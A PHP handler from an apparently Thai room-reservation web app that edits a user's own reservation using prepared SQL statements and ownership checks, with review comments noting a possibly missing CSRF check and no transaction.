Current File : /var/www/html/trr/pages/reserve_edit_db.php
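<?php
/*
 * Handles the "edit reservation" form post (submit_edit_db).
 *
 * Flow: look up the reservation by reserve_code, check that it belongs to the
 * logged-in user, update phone/subject/note, then replace the reservation's
 * time slots with the ones ticked in the form (inputs named "pid<time_code>").
 *
 * Every request value reaches the database through a bound parameter; no
 * request data is concatenated into SQL text.
 *
 * NOTE(review): no anti-CSRF token is checked in this file - confirm whether
 * check_mode_login.php or the submitting form covers that.
 * NOTE(review): the UPDATE / DELETE / INSERT steps are not wrapped in a
 * transaction, so a failure part-way leaves the reservation partially edited.
 */
ob_start();
session_start();
include 'check_mode_login.php';
include 'dbconnect.php';
include 'header.php';

// isset() guard avoids an "Undefined index" notice when the page is opened without the form post.
if (isset($_POST["submit_edit_db"]) && $_POST["submit_edit_db"])
{
  // Accept only string inputs; an array-valued field (name[]=...) is treated as empty.
  $reserve_code = (isset($_POST["reserve_code"]) && is_string($_POST["reserve_code"])) ? $_POST["reserve_code"] : '';

  // Look up the reservation. reserve_code was previously placed unquoted into the SQL,
  // so it is taken to be an unsigned integer key - NOTE(review): confirm against the schema.
  $reserve_found = false;
  $owner_name = null;
  $room_code = null;
  if (ctype_digit($reserve_code)) {
    $stmtx = mysqli_prepare($conn, "SELECT user_name, room_code FROM reserve_detail WHERE reserve_code=?");
    if ($stmtx) {
      mysqli_stmt_bind_param($stmtx, "s", $reserve_code);
      if (mysqli_stmt_execute($stmtx)) {
        mysqli_stmt_bind_result($stmtx, $owner_name, $room_code);
        $reserve_found = (mysqli_stmt_fetch($stmtx) === true);
      }
      mysqli_stmt_close($stmtx);
    }
  }

  if ($reserve_found) {
    // Does the reservation belong to the logged-in user?
    // A missing or empty session name must never match, so compare strictly.
    $session_user = isset($_SESSION['USERNAME_arit67']) ? (string)$_SESSION['USERNAME_arit67'] : '';
    if ($session_user !== '' && (string)$owner_name === $session_user) {
      $phone = (isset($_POST["phone"]) && is_string($_POST["phone"])) ? $_POST["phone"] : '';
      $subject = (isset($_POST["subject"]) && is_string($_POST["subject"])) ? $_POST["subject"] : '';
      $note = (isset($_POST["note"]) && is_string($_POST["note"])) ? $_POST["note"] : '';

      // Collect the time slots ticked in the form: one input per known time_code.
      $selected_times = array();
      $query = mysqli_query($conn, "SELECT time_code FROM reserve_time_list ORDER BY time_code ASC");
      if ($query) {
        while ($result = mysqli_fetch_array($query, MYSQLI_ASSOC)) {
          $input_name = "pid" . $result["time_code"];
          if (isset($_POST[$input_name]) && is_string($_POST[$input_name])) {
            $selected_times[] = $_POST[$input_name];
          }
        }
        mysqli_free_result($query);
      }

      if (count($selected_times) > 0) {
        // Save the editable fields to reserve_detail.
        $updated = false;
        $stmt = mysqli_prepare($conn, "UPDATE reserve_detail SET phone=?, subject=?, note=? WHERE reserve_code=?");
        if ($stmt) {
          mysqli_stmt_bind_param($stmt, "ssss", $phone, $subject, $note, $reserve_code);
          $updated = mysqli_stmt_execute($stmt);
          mysqli_stmt_close($stmt);
        }

        if ($updated) {
          // Replace the reserved time slots: delete the old ones first.
          $times_saved = true;
          $deleted = false;
          $stmt = mysqli_prepare($conn, "DELETE FROM reserve_time WHERE reserve_code=?");
          if ($stmt) {
            mysqli_stmt_bind_param($stmt, "s", $reserve_code);
            $deleted = mysqli_stmt_execute($stmt);
            mysqli_stmt_close($stmt);
          }

          if ($deleted) {
            // Insert the newly selected slots, reusing one prepared statement.
            $stmt = mysqli_prepare($conn, "INSERT INTO reserve_time (reserve_code,reserve_time) VALUES (?,?)");
            if ($stmt) {
              $time_value = '';
              // bind_param binds by reference, so assigning $time_value below changes the bound value.
              mysqli_stmt_bind_param($stmt, "ss", $reserve_code, $time_value);
              foreach ($selected_times as $selected) {
                $time_value = $selected;
                if (!mysqli_stmt_execute($stmt)) {
                  echo "ไม่สามารถเพิ่มเวลาที่เลือกได้";
                  $times_saved = false;
                }
              }
              mysqli_stmt_close($stmt);
            } else {
              echo "ไม่สามารถเพิ่มเวลาที่เลือกได้";
              $times_saved = false;
            }
          } else {
            echo "ไม่สามารถลบเวลาเดิมได้";
            $times_saved = false;
          }

          // Report success only when every step succeeded; the link back to the list is always shown.
          if ($times_saved) {
?>
		<BR />บันทึกข้อมูลเรียบร้อยแล้ว
<?php
          }
          // room_code comes from the database but is still escaped for the HTML attribute context.
?>
		<BR /><BR /><a href="index.php#<?php echo htmlspecialchars((string)$room_code, ENT_QUOTES, 'UTF-8');?>"><button type="button" class="btn-success">คลิกที่นี่เพื่อดูรายการจอง</button></a>
<?php
        } else {
          echo "ไม่สามารถบันทึกข้อมูลได้";
        }
      } else {
        // No time slot was selected.
?>
		<BR />กรุณาเลือกการช่วงเวลาที่ต้องการจอง
		<BR /><BR /><a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
<?php
      }
    } else {
      // Only the user who made the reservation may edit it.
?>
		<h1><font color="#FF0000">ไม่สามารถแก้ไขรายละเอียดการจองได้ ผู้ที่ทำการจองเท่านั้นที่จะแก้ไขรายละเอียดการจองได้</font></h1>
<?php
    }
  } else {
    // Unknown, malformed or unreadable reserve_code.
    echo "ไม่พบข้อมูลการจอง";
  }
}
?>

<?php include 'footer.php'; ?>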
